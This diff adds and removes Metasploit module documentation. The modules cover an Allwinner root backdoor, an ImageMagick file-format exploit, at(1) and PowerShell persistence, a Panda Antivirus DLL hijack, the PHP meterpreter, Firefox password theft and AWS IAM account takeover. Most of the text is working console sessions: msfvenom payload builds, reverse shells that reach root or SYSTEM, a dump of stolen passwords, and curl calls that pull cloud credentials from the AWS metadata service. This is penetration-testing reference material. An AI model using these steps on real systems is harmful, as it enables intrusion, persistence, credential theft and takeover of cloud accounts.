+To use this module, you need a vulnerable device.  An Orange Pi (PC model) running Lubuntu 14.04 v0.8.0 works, but other OSes for the device (as well as other devices) are also vulnerable.
+
+- `use auxiliary/scanner/ssh/ssh_login`
+
+```
+msf auxiliary(ssh_login) > set username orangepi
+username => orangepi
+msf auxiliary(ssh_login) > set password orangepi
+password => orangepi
+msf auxiliary(ssh_login) > set rhosts 192.168.2.21
+rhosts => 192.168.2.21
+msf auxiliary(ssh_login) > exploit
+
+[*] 192.168.2.21:22 SSH - Starting bruteforce
+[+] 192.168.2.21:22 SSH - Success: 'orangepi:orangepi' 'uid=1001(orangepi) gid=1001(orangepi) groups=1001(orangepi),27(sudo),29(audio) Linux orangepi 3.4.39 #41 SMP PREEMPT Sun Jun 21 13:09:26 HKT 2015 armv7l armv7l armv7l GNU/Linux '
+[!] No active DB -- Credential data will not be saved!
+[*] Command shell session 1 opened (192.168.2.229:33673 -> 192.168.2.21:22) at 2016-05-17 21:55:27 -0400
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+- `use exploit/multi/local/allwinner_backdoor`
+
+```
+msf exploit(allwinner_backdoor) > set verbose true
+verbose => true
+msf exploit(allwinner_backdoor) > set session 1
+session => 1
+msf exploit(allwinner_backdoor) > set payload linux/armle/mettle/reverse_tcp
+payload => linux/armle/mettle/reverse_tcp
+msf exploit(allwinner_backdoor) > set lhost 192.168.2.117
+lhost => 192.168.2.117
+msf exploit(allwinner_backdoor) > check
+[*]  The target appears to be vulnerable.
+msf exploit(allwinner_backdoor) > exploit
+```
+
+## Successful exploitation:
+
+```
+[*] Started reverse TCP handler on 192.168.2.117:4444 
+[*] Transmitting intermediate stager...(136 bytes)
+[*] Sending stage (374540 bytes) to 192.168.2.248
+[+] Backdoor Found, writing payload to /tmp/odzVx.elf
+[*] Max line length is 65537
+[*] Writing 284 bytes in 1 chunks of 843 bytes (octal-encoded), using printf
+[+] Escalating
+[*] Transmitting intermediate stager...(136 bytes)
+[*] Sending stage (374540 bytes) to 192.168.2.248
+[*] Meterpreter session 2 opened (192.168.2.117:4444 -> 192.168.2.248:49472) at 2016-09-22 21:56:50 -0400
+
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+meterpreter > sysinfo
+Computer     : 192.168.2.248
+OS           : Ubuntu 14.04 (Linux 3.4.39)
+Architecture : armv7l
+Meterpreter  : armle/linux
+```
@@ -0,0 +1,54 @@
+## Vulnerable Application
+
+  ImageMagick
+
+## Verification Steps
+
+  Example steps in this format:
+
+  1. Install the ImageMagick
+  2. Start msfconsole
+  3. Do: ```use exploits/unix/fileformat/imagemagick_delegate```
+  4. Do: ```run```
+  5. convert msf.png msf.jpg
+
+## Options
+
+  **USE_POPEN**
+
+  When the default option `true` is used, targets 0 (SVG file) and 1 (MVG file) are valid
+  When the option is set to `false`, target 2 (PS file) is valid
+
+## Scenarios
+
+## popen=true
+  ```
+  msf exploit(imagemagick_delegate) > set target 0
+  msf exploit(imagemagick_delegate) > run
+
+  [*] Started reverse TCP handler on 1.1.1.1:4444
+  [+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png
+  [*] Command shell session 1 opened (1.1.1.11:4444 -> 1.1.1.1:57212) at 2016-10-28 12:47:06 -0500
+  ```
+
+  ```
+  msf exploit(imagemagick_delegate) > set target 1
+  msf exploit(imagemagick_delegate) > run
+
+  [*] Started reverse TCP handler on 10.6.0.186:4444
+  [+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png
+  [*] Command shell session 2 opened (1.1.1.1:4444 -> 1.1.1.1:64308) at 2016-10-28 15:48:40 -0500
+  ```
+
+## popen=false
+  ```
+  msf exploit(imagemagick_delegate) > set target 2
+  target => 2
+  msf exploit(imagemagick_delegate) > set USE_POPEN false
+  USE_POPEN => false
+  msf exploit(imagemagick_delegate) > run
+
+  [*] Started reverse TCP handler on 1.1.1.1:4444
+  [+] msf.png stored at /Users/dmohanty/.msf4/local/msf.png
+  [*] Command shell session 5 opened (1.1.1.1:4444 -> 1.1.1.1:64772) at 2016-10-28 15:58:03 -0500
+  ```
@@ -0,0 +1,32 @@
+## Vulnerable Application
+
+This module executes a metasploit payload utilizing `at(1)` to execute jobs at a specific time.  It should work out of the box
+with any UNIX-like operating system with `atd` running.  In the case of OS X, the `atrun` service must be launched:
+
+```
+sudo launchctl load -w /System/Library/LaunchDaemons/com.apple.atrun.plist
+```
+
+## Verification Steps
+
+  1. Start msfconsole
+  2. Exploit a box via whatever method
+  3. Do: `use exploit/unix/local/at_persistence`
+  4. Do: `set session #`
+  5. Do: `set target #`
+  6. `exploit`
+
+
+## Options
+
+  **TIME**
+
+  When to run job via at(1).  Changing may require WfsDelay to be adjusted.
+
+  **PATH**
+
+  Path to store payload to be executed by at(1).  Leave unset to use mktemp.
+
+## Scenarios
+
+This module is useful for running one-shot payloads with delayed execution. It is slightly less obvious than cron.
@@ -0,0 +1,154 @@
+## Vulnerable Application
+
+  Panda Antivirus Pro 2016 16.1.2 is available from [filehippo](http://filehippo.com/download_panda_antivirus_pro_2017/download/b436969174c5ca07a27a0aedf6456c89/) or from an unofficial [git](https://github.com/h00die/MSF-Testing-Scripts/blob/master/Panda_AV_Pro2016_16.1.2.exe).
+
+  The AV must be running for PSEvents.exe to run and the module to get called, which can take up to an hour.  I 32bit meterpreter seems to get caught, so you may need an AV exclusion for the folder to ensure it didn't catch meterpreter in action.
+
+  The downloads folder can take a 10-15 minutes to appear after install, and its downloaded by Panda AV from the company.
+
+  1. Theres an HTTP GET request to 23.215.132.154 for /retail/psprofiler/40032/psprofiler_suite.exe
+  2. Then right after HTTP GET request to 23.215.132.154 for /retail/psevents_suite.exe.
+
+## Verification Steps
+
+  Example steps in this format:
+
+  1. Install the application
+  2. Wait for `C:\\ProgramData\\Panda Security\\Panda Devices Agent\\Downloads` folder to appear
+  3. Start msfconsole
+  4. Get a shell
+  5. Do: `use exploit/windows/local/panda_psevents`
+  6. Do: `set session #`
+  7. Do: `exploit`
+  8. Go do something else while you wait
+  9. Enjoy being system with your shell
+
+## Options
+
+  **DLL**
+
+  Which DLL to name our payload.  The original vulnerability writeup utilized bcryptPrimitives.dll, and mentioned several others that could be used.  However the dll seems to be VERY picky.  Default is cryptnet.dll.  See the chart for more details.
+  
+|                                           | WINHTTP.dll | VERSION.dll | bcryptPrimitives.dll | CRYPTBASE.dll | cryptnet.dll | WININET.dll |
+|---------------------------------------------------------------|-------------|-------------|----------------------|---------------|--------------|-------------|
+| 64bit target (1), win10 x64 | CRASH | CRASH | NO |  NO       | valid     |    no |
+| 64bit target (1), win8.1 x86 | CRASH | CRASH | NO |  valid     | valid     |    no |
+| 32bit target (0), win10 x64 | CRASH | CRASH | NO | NO        | valid     |    no |
+| 32bit target (0), win8.1 x86 | CRASH | CRASH | NO |  valid     | valid (caught by av)     |    no |
+| 32bit target (0), win7sp1 x86 |  |  | valid |       | valid (caught by av)     |     |
+
+In this chart, `CRASH` means PSEvents.exe crashed on the system.  `NO` means PSEvents didn't crash, but no session was obtained.  `valid` means we got a shell.
+  
+  **ListenerTimeout**
+  
+  How long to wait for a shell.  PSEvents.exe runs every hour or so, so the default is 3610 (10sec to account for code execution or other things)
+
+## Scenarios
+
+### Windows 8.1 x86 with Panda Antirivus Pro 2016 16.1.2
+
+  Step 1, get a local shell.  I used msfvenom to drop an exe for easy user level meterpreter.
+  
+    msfvenom -a x86 --platform windows -p windows/meterpreter_reverse_tcp -f exe -o meterpreter.exe -e x86/shikata_ga_nai -i 1 LHOST=192.168.2.117 LPORT=4449
+    
+    msf > use exploit/multi/handler 
+    msf exploit(handler) > set payload windows/meterpreter_reverse_tcp 
+    payload => windows/meterpreter_reverse_tcp
+    msf exploit(handler) > set lhost 192.168.2.117
+    lhost => 192.168.2.117
+    msf exploit(handler) > set lport 4449
+    lport => 4449
+    msf exploit(handler) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.117:4449 
+    [*] Starting the payload handler...
+    [*] Meterpreter session 1 opened (192.168.2.117:4449 -> 192.168.2.91:63617) at 2016-09-25 20:32:15 -0400
+    
+    meterpreter > getuid
+    Server username: IE11Win8_1\IEUser
+    meterpreter > background
+    [*] Backgrounding session 1...
+
+  Step 2, drop our panda exploit
+
+    use exploit/windows/local/panda_psevents
+    msf exploit(panda_psevents) > set session 1
+    session => 1
+    msf exploit(panda_psevents) > set payload windows/meterpreter/reverse_tcp
+    payload => windows/meterpreter/reverse_tcp
+    msf exploit(panda_psevents) > set exitfunc seh
+    exitfunc => seh
+    msf exploit(panda_psevents) > set DLL CRYPTBASE.dll
+    DLL => CRYPTBASE.dll
+    msf exploit(panda_psevents) > show options
+    
+    Module options (exploit/windows/local/panda_psevents):
+    
+       Name             Current Setting  Required  Description
+       ----             ---------------  --------  -----------
+       DLL              CRYPTBASE.dll    yes       dll to create (Accepted: cryptnet.dll, bcryptPrimitives.dll, CRYPTBASE.dll)
+       ListenerTimeout  3610             yes       Number of seconds to wait for the exploit
+       SESSION          1                yes       The session to run this module on.
+    
+    
+    Payload options (windows/meterpreter/reverse_tcp):
+    
+       Name      Current Setting  Required  Description
+       ----      ---------------  --------  -----------
+       EXITFUNC  seh              yes       Exit technique (Accepted: '', seh, thread, process, none)
+       LHOST     192.168.2.117    yes       The listen address
+       LPORT     4450             yes       The listen port
+    
+    
+    Exploit target:
+    
+       Id  Name
+       --  ----
+       0   Windows x86
+    
+    
+    
+    msf exploit(panda_psevents) > exploit
+    
+    [*] Started reverse TCP handler on 192.168.2.117:4450 
+    [*] Uploading the Payload DLL to the filesystem...
+    [*] Starting the payload handler, waiting for PSEvents.exe to process folder (up to an hour)...
+    [*] Start Time: 2016-09-27 18:10:21 -0400
+    [*] Sending stage (957999 bytes) to 192.168.2.91
+    [*] Meterpreter session 2 opened (192.168.2.117:4450 -> 192.168.2.91:50022) at 2016-09-27 18:46:15 -0400
+    [+] Deleted C:\ProgramData\Panda Security\Panda Devices Agent\Downloads\1a2d7253f106c617b45f675e9be08171\CRYPTBASE.dll
+    
+    meterpreter > getuid
+    Server username: NT AUTHORITY\SYSTEM
+    meterpreter > sysinfo
+    Computer        : IE11WIN8_1
+    OS              : Windows 8.1 (Build 9600).
+    Architecture    : x86
+    System Language : en_US
+    Domain          : WORKGROUP
+    Logged On Users : 2
+    Meterpreter     : x86/win32
+    meterpreter > background
+
+## Failed Exploitation Attempts
+
+If the dll doesn't work, PSEvents.exe will fail to run.  While silent to the user, an error will occur in the Application Windows Logs.
+
+ * Event ID: 1000
+ * Task Category (100)
+ * Log Name: Application
+ * Source: Application Error
+ * Details:
+```
+Faulting application name: PSEvents.exe, version: 4.0.0.35, time stamp: 0x57061ba6
+Faulting module name: ntdll.dll, version: 6.3.9600.17415, time stamp: 0x54504b06
+Exception code: 0xc0000374
+Fault offset: 0x000d0cf2
+Faulting process id: 0xdd0
+Faulting application start time: 0x01d218a30fbf1ac5
+Faulting application path: C:\ProgramData\Panda Security\Panda Devices Agent\Downloads\1a2d7253f106c617b45f675e9be08171\PSEvents.exe
+Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
+Report Id: 4de7a07e-8496-11e6-9735-000c29e0cffb
+Faulting package full name: 
+Faulting package-relative application ID:
+```
@@ -0,0 +1,63 @@
+
+## Example Usage
+
+```
+msf exploit(handler) > use exploit/windows/local/ps_persist
+msf exploit(ps_persist) > set session -1
+session => -1
+msf exploit(ps_persist) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(ps_persist) > set lhost 192.168.56.1
+lhost => 192.168.56.1
+msf exploit(ps_persist) > set lport 4445
+lport => 4445
+msf exploit(ps_persist) > show options
+
+Module options (exploit/windows/local/ps_persist):
+
+   Name           Current Setting  Required  Description
+   ----           ---------------  --------  -----------
+   OUTPUT_TARGET                   no        Name and path of the generated executable, default random, omit extension
+   SESSION        -1               yes       The session to run this module on.
+   START_APP      true             no        Run EXE/Install Service
+   SVC_DNAME      MsfDynSvc        no        Display Name to use for the Windows Service
+   SVC_GEN        false            no        Build a Windows service, which defaults to running as localsystem
+   SVC_NAME       MsfDynSvc        no        Name to use for the Windows Service
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST                      yes       The listen address
+   LPORT     4445             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Universal
+
+
+msf exploit(ps_persist) > run
+
+[*] Started reverse TCP handler on 192.168.56.1:4445
+[+]  - Bytes remaining: 9664
+[+]  - Bytes remaining: 1664
+[+] Payload successfully staged.
+[*] Sending stage (957999 bytes) to 192.168.56.101
+[+] Finished!
+[*] Meterpreter session 2 opened (192.168.56.1:4445 -> 192.168.56.101:49974) at 2016-10-08 18:42:36 -0500
+
+meterpreter > sysinfo
+Computer        : DESKTOP-B8ALP1P
+OS              : Windows 10 (Build 14393).
+Architecture    : x64 (Current Process is WOW64)
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/win32
+```
+
@@ -0,0 +1,154 @@
+The php/meterpreter/reverse_tcp is a staged payload used to gain meterpreter access to a compromised system. This is a unique payload in the Metasploit Framework because this payload is one of the only payloads that are used in RFI vulnerabilities in web apps. This module _can_ be cross platform, but the target needs to be able to run php code.
+
+
+## Vulnerable Application
+
+  The PHP Meterpreter is suitable for any system that supports PHP. For example, the module can be used against webservers which run PHP code for a website. OS X has PHP installed by default.
+
+## Deploying php/meterpreter/reverse_tcp
+### Scenarios
+
+  Specific demo of using the module that might be useful in a real world scenario.
+
+#### Generating a file with msfvenom
+  ```
+  msfvenom -p php/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o evil.php
+  ```
+
+
+#### Starting a listener
+  ```
+msf > use multi/handler
+msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
+PAYLOAD => php/meterpreter/reverse_tcp
+msf exploit(handler) > set LHOST [IP]
+  ```
+  
+## Important Basic Commands
+
+Compared to a native Meterpreter such as windows/meterpreter/reverse_tcp, the PHP Meterpreter
+has less commands, but here's a list of all the common ones you might need:
+
+**pwd command**
+
+The ```pwd``` command tells you the current working directory. For example:
+
+```
+meterpreter > pwd
+/Users/thecarterb/Desktop
+```
+
+**cd command**
+
+The ```cd``` command allows you to change directories. Example:
+
+```
+meterpreter > cd /Users/thecarterb/Desktop
+meterpreter > pwd
+/Users/thecarterb/Desktop
+```
+
+**cat command**
+
+The ```cat``` command allows you to see the content of a file:
+
+```
+meterpreter > cat /tmp/data.txt
+Hello World!
+```
+
+**upload command**
+
+The ```upload``` command allows you to upload a file to the remote target. This is useful for uploading additional payload files. For example:
+
+```
+meterpreter > upload /tmp/data.txt /Users/thecarterb/Desktop
+[*] uploading  : /tmp/data.txt -> /Users/thecarterb/Desktop
+[*] uploaded   : /tmp/data.txt -> /Users/thecarterb/Desktop/data.txt
+meterpreter >
+```
+
+**download command**
+
+The ```download``` command allows you to download a file from the remote target to your machine.
+For example:
+
+```
+meterpreter > download /Users/thecarterb/Desktop/data.txt /tmp/pass.txt
+[*] downloading: /Users/thecarterb/Desktop/data.txt -> /tmp/pass.txt/data.txt
+[*] download   : /Users/thecarterb/Desktop/data.txt -> /tmp/pass.txt/data.txt
+meterpreter >
+```
+
+**search command**
+
+The ```search``` command allows you to find files on the remote file system. For example,
+this shows how to find all text files in the current directory:
+
+```
+meterpreter > search -d . -f *.txt
+Found 2 results...
+    .\pass.txt (13 bytes)
+    ./creds\data.txt (83 bytes)
+meterpreter >
+```
+
+Without the ```-d``` option, the command will attempt to search in all drives.
+
+The ```-r``` option for the command allows you to search recursively.
+
+
+**getuid command**
+
+The ```getuid``` command tells you the current user that Meterpreter is running on. For example:
+
+```
+meterpreter > getuid
+Server username: root
+```
+
+**execute command**
+
+The ```execute``` command allows you to execute a command or file on the remote machine.
+
+The following examples uses the command to create a text file:
+
+```
+meterpreter > execute -f echo -a "hello > /tmp/hello.txt"
+Process 73642 created.
+meterpreter >
+```
+
+**ps command**
+
+The ```ps``` command lists the running processes on the remote machine.
+
+**shell command**
+
+The ```shell``` command allows you to interact with the remote machine's command prompt (or shell).
+For example:
+
+```
+meterpreter > shell
+Process 74513 created.
+Channel 2 created.
+sh-3.2#
+```
+
+If you wish to get back to Meterpreter, do [CTRL]+[Z] to background the channel.
+
+**sysinfo**
+
+The ```sysinfo``` command shows you basic information about the remote machine. Such as:
+
+* Computer name
+* OS name
+* Architecture
+* Meterpreter type
+
+## Using `post` modules
+When using the PHP Meterpreter, you have the feature of using Metasploit's `post` modules on that specific session. By default, most `multi` post modules will work; however, you can also use OS specific modules depending on the OS of the compromised system. For example, if you have a PHP Meterpreter session running on OS X, you can use `osx` post modules on that session. 
+
+  __Don't forget to:__
+  - Set the `LHOST` datastore option to the connect-back IP Address
+  - If you want to get multiple shells, set `ExitOnSession` to `false`
@@ -0,0 +1,68 @@
+## Vulnerable Application
+
+  This post-exploitation module allows the collection of saved Firefox passwords from a Firefox privileged javascript shell.
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Get privileged javascript session
+  3. Do: `use post/firefox/gather/passwords`
+  4. Do: `set SESSION <session id>`
+  5. Do: `run`
+  6. You should be able to see all saved Firefox passwords in the loot file in JSON format
+
+## Options
+
+  - **SESSION** - The session to run the module on.
+
+  - **TIMEOUT** - Maximum time (seconds) to wait for a response. The default value is 90.
+
+## Scenarios
+
+  **Obtain a privileged javascript shell and gather saved Firefox passwords**
+
+  To be able to use this module, a privileged javascript shell is needed. It can be obtained by using a javascript privilege exploit like `exploit/multi/browser/firefox_proto_crmfrequest`, `exploit/multi/browser/firefox_proxy_prototype` or others.
+  In the example case of the `firefox_proto_crmfrequest` exploit use `set TARGET 0` to use a javascript shell.
+
+  ```
+  msf > use exploit/multi/browser/firefox_proto_crmfrequest
+  msf exploit(firefox_proto_crmfrequest) > set TARGET 0
+  TARGET => 0
+  msf exploit(firefox_proto_crmfrequest) > run
+  [*] Exploit running as background job.
+  msf exploit(firefox_proto_crmfrequest) >
+  [*] Started reverse TCP handler on 192.168.2.117:4444
+  [*] Using URL: http://0.0.0.0:8080/nbHsSeXAfjr
+  [*] Local IP: http://192.168.2.117:8080/nbHsSeXAfjr
+  [*] Server started.
+  [*] Gathering target information for 192.168.2.117
+  [*] Sending HTML response to 192.168.2.117
+  [*] Sending HTML
+  [*] Sending the malicious addon
+  [*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.117:35100) at 2016-10-08 00:33:09 +0200
+
+  msf exploit(firefox_proto_crmfrequest) > use post/firefox/gather/passwords
+  msf post(passwords) > set SESSION 1
+  SESSION => 1
+  msf post(passwords) > run
+
+  [*] Running the privileged javascript...
+  [+] Saved 1 passwords to /home/user/.msf4/loot/20161008003433_default_192.168.2.117_firefox.password_070261.txt
+  [*] Post module execution completed
+  ```
+
+  The loot file then contains all passwords in json format, like so:
+
+  ```
+  [  
+     {  
+        "password":"1234",
+        "passwordField":"pwd",
+        "username":"admin",
+        "usernameField":"log",
+        "httpRealm":"",
+        "formSubmitURL":"https://example.com",
+        "hostname":"https://example.com"
+     }
+  ]
+  ```
@@ -1,93 +0,0 @@
-  Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4
-  Vulnerable OS: all OS images available for Orange Pis,
-				 any for FriendlyARM's NanoPi M1,
-				 SinoVoip's M2+ and M3,
-				 Cuebietech's Cubietruck +
-				 Linksprite's pcDuino8 Uno
-  Exploitation may be possible against Dragon (x10) and Allwinner Android tablets
-
-This module attempts to exploit a debug backdoor privilege escalation in Allwinner SoC based devices. Implements the Allwinner privilege escalation as documented in [Metasploit issue #6869](https://github.com/rapid7/metasploit-framework/issues/6869).  It is a simple debug kernel module that, when "rootmydevice" is echoed to the process, it escalates the shell to root.
-
-## Usage
-
-To use this module, you need a vulnerable device.  An Orange Pi (PC model) running Lubuntu 14.04 v0.8.0 works, but other OSes for the device (as well as other devices) are also vulnerable.
-
- `use auxiliary/scanner/ssh/ssh_login`
-
-```
-msf auxiliary(ssh_login) > set username orangepi
-username => orangepi
-msf auxiliary(ssh_login) > set password orangepi
-password => orangepi
-msf auxiliary(ssh_login) > set rhosts 192.168.2.21
-rhosts => 192.168.2.21
-msf auxiliary(ssh_login) > exploit
-
-[*] 192.168.2.21:22 SSH - Starting bruteforce
-[+] 192.168.2.21:22 SSH - Success: 'orangepi:orangepi' 'uid=1001(orangepi) gid=1001(orangepi) groups=1001(orangepi),27(sudo),29(audio) Linux orangepi 3.4.39 #41 SMP PREEMPT Sun Jun 21 13:09:26 HKT 2015 armv7l armv7l armv7l GNU/Linux '
-[!] No active DB -- Credential data will not be saved!
-[*] Command shell session 1 opened (192.168.2.229:33673 -> 192.168.2.21:22) at 2016-05-17 21:55:27 -0400
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-```
-
- `use post/multi/escalate/allwinner_backdoor`
-
-```
-msf post(allwinner_backdoor) > set verbose true
-verbose => true
-msf post(allwinner_backdoor) > set session 1
-session => 1
-msf post(allwinner_backdoor) > run
-```
-
-## Successful exploitation:
-
-```
-[+] Backdoor found, exploiting.
-[+] Privilege Escalation Successful
-[*] Post module execution completed
-msf post(allwinner_backdoor) > sessions -i 1
-[*] Starting interaction with 1...
-
-2013564244
-uHvwyYtCTXENEYdrCoKdgVxTpKlbnqsW
-true
-RUVRnPJFFgVpuqEiYXdtXpwdDZxVwZPS
-TitlDmvnSvINczARsMAKdajpRoXEohXO
-0
-RtBPRSiAsiGoFatKQVukpjIjGBpJdXqq
-id
-uid=0(root) gid=0(root) groups=0(root),27(sudo),29(audio),1001(orangepi)
-^Z
-Background session 1? [y/N]  y
-```
-
-## Graceful exit on non-vulnerable devices:
-
-```
-msf > use auxiliary/scanner/ssh/ssh_login
-msf auxiliary(ssh_login) > set username pi
-username => pi
-msf auxiliary(ssh_login) > set password raspberry
-password => raspberry
-msf auxiliary(ssh_login) > set rhosts basementpi
-rhosts => basementpi
-msf auxiliary(ssh_login) > exploit
-
-[*] 192.168.2.80:22 SSH - Starting bruteforce
-[+] 192.168.2.80:22 SSH - Success: 'pi:raspberry' 'uid=1000(pi) gid=1000(pi) groups=1000(pi),4(adm),20(dialout),24(cdrom),27(sudo),29(audio),44(video),46(plugdev),60(games),100(users),106(netdev),996(gpio),997(i2c),998(spi),999(input) Linux basementpi 4.1.19-v7+ #858 SMP Tue Mar 15 15:56:00 GMT 2016 armv7l GNU/Linux '
-[!] No active DB -- Credential data will not be saved!
-[*] Command shell session 1 opened (192.168.2.229:36438 -> 192.168.2.80:22) at 2016-05-17 22:19:57 -0400
-[*] Scanned 1 of 1 hosts (100% complete)
-[*] Auxiliary module execution completed
-msf auxiliary(ssh_login) > use post/multi/escalate/allwinner_backdoor
-msf post(allwinner_backdoor) > set verbose true
-verbose => true
-msf post(allwinner_backdoor) > set session 1
-session => 1
-msf post(allwinner_backdoor) > run
-
-[-] Backdoor /proc/sunxi_debug/sunxi_debug not found.
-[*] Post module execution completed
-```
@@ -0,0 +1,284 @@
+# aws_create_iam_user
+
+aws_create_iam_user is a simple post module that can be used to take over AWS
+accounts. Sure, it is fun enough to take over a single host, but you can own all
+hosts in the account if you simply create an admin user.
+
+# Background
+
+## Instance Profiles
+
+An Instance Profile is an AWS construct that maps a role to a host (instance).
+Not all hosts have instance profiles and/or may have restricted privileges.
+AWS roles are composed of policies which specify API calls that the host is
+allowed to make.
+
+## Privileges
+
+This module depends on administrators being lazy and not using the least
+privileges possible. We often see instances assigned `*.*` roles that allow
+any user on the instance to make any API call including creating admin users.
+When this occours, a user with long lived credentials can be created and calls
+against the AWS API can be made from anywhere on the Internet. Once an account
+is taken over in this manner instances can be spun up, other users can be locked
+out, networks can be traversed, and many other dangeous things can happen.
+
+Only on rare cases should hosts have the following privileges, these should be
+restriced.
+
+* iam:CreateUser
+* iam:CreateGroup
+* iam:PutGroupPolicy
+* iam:AddUserToGroup
+* iam:CreateAccessKey
+
+This module will attempt all API calls listed above in sequence. Account takeover
+may succeed even if intermediate API calls fail. E.g., we may not be able to
+create a new user, but we may be able to create access keys for an existing user.
+
+## Metadata Service
+
+The metadata service is a mechanism the AWS hypervisor employs to pass
+information down into hosts. Any AWS host can retrieve information about itself
+and its environemtn by curling http://169.254.169.254/. This mechanism is also
+used to pass temporary credentials to a host. This module pulls these temporary
+credentials and attempts to create a user with admin privileges.
+
+To manually check that a host has an instance profile you can simply curl the
+metadata service like so:
+
+```
+$ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
+SOME_ROLE_NAME
+$ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/SOME_ROLE_NAME
+{
+  "Code" : "Success",
+  "LastUpdated" : "2016-12-07T18:36:48Z",
+  "Type" : "AWS-HMAC",
+  "AccessKeyId" : "ASIA
+  ...
+```
+
+# Usage
+
+aws_create_iam_user can be used to take over an AWS account given access to
+a host having 1). overly permissive instance profile/role, 2). API Access keys.
+Once a foothold is established, you can run the module to pull temporary
+access keys from the metadata service. If this fails, search the instance for
+API access keys, e.g., see ~/.aws/credentials, and set `AccessKeyId`,
+`SecretAccessKey`, & `Token` (optional).
+
+## Establish a foothold
+
+You first need a foothold in AWS, e.g., here we use `sshexec` to get the
+foothold and launch a meterpreter session.
+
+```
+$ ./msfconsole
+...
+msf > use exploit/multi/ssh/sshexec
+msf exploit(sshexec) > set password some_user
+password => some_user
+msf exploit(sshexec) > set username some_user
+username => some_user
+msf exploit(sshexec) > set RHOST 192.168.1.2
+RHOST => 192.168.1.2
+msf exploit(sshexec) > set payload linux/x86/meterpreter/bind_tcp
+payload => linux/x86/meterpreter/bind_tcp
+msf exploit(sshexec) > exploit -j
+[*] Exploit running as background job.
+
+[*] Started bind handler
+msf exploit(sshexec) > [*] 192.168.1.2:22 - Sending stager...
+[*] Transmitting intermediate stager for over-sized stage...(105 bytes)
+[*] Command Stager progress -  42.09% done (306/727 bytes)
+[*] Command Stager progress - 100.00% done (727/727 bytes)
+[*] Sending stage (1495599 bytes) to 192.168.1.2
+[*] Meterpreter session 1 opened (192.168.1.1:33750 -> 192.168.1.2:4444) at 2016-11-21 17:58:42 +0000
+```
+
+We will be using session 1.
+
+```
+msf exploit(sshexec) > sessions
+
+Active sessions
+===============
+
+  Id  Type                   Information                                                                       Connection
+  --  ----                   -----------                                                                       ----------
+  1   meterpreter x86/linux  uid=50011, gid=50011, euid=50011, egid=50011, suid=50011, sgid=50011 @ ip-19-...  192.168.1.1:41634 -> 192.168.1.2:4444 (192.168.1.2)
+
+```
+
+## Options
+
+By default the module will:
+
+* create a randomly named IAM user and group
+* generate API Keys and User password for after
+
+In the event that the session'd AWS instance does not have an IAM role assigned
+to it with sufficient privileges, the following options can be used to provide
+specific authentication material:
+
+* `AccessKeyId`: set this if you find access keys on the host and instance has no profile/privileges
+* `SecretAccessKey`: set this if you find access keys on the host and instance has no profile/privileges
+* `Token`: set this if you find access keys on the host and instance has no profile/privileges. This is optional as this signifies temporary keys, if you find these, these are most likely expired.
+
+The following options control the account that is being created:
+
+* `IAM_USERNAME`: set this if you would like to control the username for to user to be created
+* `IAM_PASSWORD`: set this if you would like to control the password for the created user
+* `CREATE_API`: when true, creates API keys for this user
+* `CREATE_CONSOLE`: when true, creates a password for this user so that they can access the AWS console
+
+```
+msf exploit(sshexec) > use post/multi/escalate/aws_create_iam_user
+msf post(aws_create_iam_user) > show options
+
+Module options (post/multi/escalate/aws_create_iam_user):
+
+   Name             Current Setting  Required  Description
+   ----             ---------------  --------  -----------
+   AccessKeyId                       no        AWS access key
+   CREATE_API       true             yes       Add access key ID and secret access key to account (API, CLI, and SDK access)
+   CREATE_CONSOLE   true             yes       Create an account with a password for accessing the AWS management console
+   IAM_GROUPNAME                     no        Name of the group to be created (leave empty or unset to use a random name)
+   IAM_PASSWORD                      no        Password to set for the user to be created (leave empty or unset to use a random name)
+   IAM_USERNAME                      no        Name of the user to be created (leave empty or unset to use a random name)
+   Proxies                           no        A proxy chain of format type:host:port[,type:host:port][...]
+   SESSION                           yes       The session to run this module on.
+   SecretAccessKey                   no        AWS secret key
+   Token                             no        AWS session token
+
+```
+
+## Abusing an Overly Permissive Instance Profile
+
+Here we are assuming that we have taken over a host having an instance profile with
+overly permissive access. Once a session is established, we can load
+`aws_create_iam_user` and specify a meterpreter sesssion,
+e.g., `SESSION 1` and run the exploit.
+
+```
+msf post(aws_create_iam_user) > set SESSION 1
+SESSION => 1
+msf post(aws_create_iam_user) > exploit
+
+[*] 169.254.169.254 - looking for creds...
+[*] Creating user: gavgpsjXwj5HIxiz
+[*] Creating group: gavgpsjXwj5HIxiz
+[*] Creating group policy: gavgpsjXwj5HIxiz
+[*] Adding user (gavgpsjXwj5HIxiz) to group: gavgpsjXwj5HIxiz
+[*] Creating API Keys for gavgpsjXwj5HIxiz
+[*] Creating password for gavgpsjXwj5HIxiz
+AWS Account Information
+=======================
+
+UserName          GroupName         SecretAccessKey                           AccessKeyId           Password          AccountId
+--------          ---------         ---------------                           -----------           --------          ---------
+gavgpsjXwj5HIxiz  gavgpsjXwj5HIxiz  oX4csvu3Wun+GqVDzBHQ3FNfv41UhC4ibkLAmaW2  AKIAJRZQ2ENY45KKRBHQ  gavgpsjXwj5HIxiz  xxxxx
+
+[+] AWS CLI/SDK etc can be accessed by configuring with the above listed values
+[+] AWS console URL https://xxxxx.signin.aws.amazon.com/console may be used to access this account
+[+] AWS loot stored at: /Users/yyyy/.msf4/loot/20161208140720_default_172.30.0.116_AWScredentials_099259.txt
+```
+
